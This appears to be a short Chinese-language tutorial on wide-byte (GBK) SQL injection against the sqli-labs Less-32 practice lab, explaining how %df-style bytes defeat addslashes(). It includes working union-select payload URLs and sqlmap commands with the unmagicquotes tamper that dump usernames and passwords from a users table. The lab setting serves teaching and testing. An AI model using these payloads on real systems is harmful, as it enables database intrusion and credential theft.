0X01 宽字节注入基础
最常使用的宽字节注入是利用%df,其实我们只要第一个ascii码大于128就可以了,比如ascii码为129的就可以,但是我们怎么将他转换为URL编码呢,其实很简单,我们先将129(十进制)转换为十六进制,为0x81,然后在十六进制前面加%即可,即为%81
GBK首字节对应0×81-0xFE ,尾字节对应0×40-0xFE(除0×7F)
0X02 宽字节注入代码分析
Less-32 Bypass addslashes()
mysql_real_escape_string() 和 addslashes()功能类似
0X03 宽字节SQL注入演示
id=1%df’ --+
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df%27%20union%20select%201,2,3%20–+
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df%27%20union%20select%201,database(),3%20–+
0X04 sqlmap安全检测
sqlmap.py -u"http://url/?id=1" --tamper=unmagicquotes.py
sqlmap.py -u “http://127.0.0.1/sqli-labs/Less-32/?id=1” --tamper=unmagicquotes.py -D security -T users -C “username,password” --dump
-----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。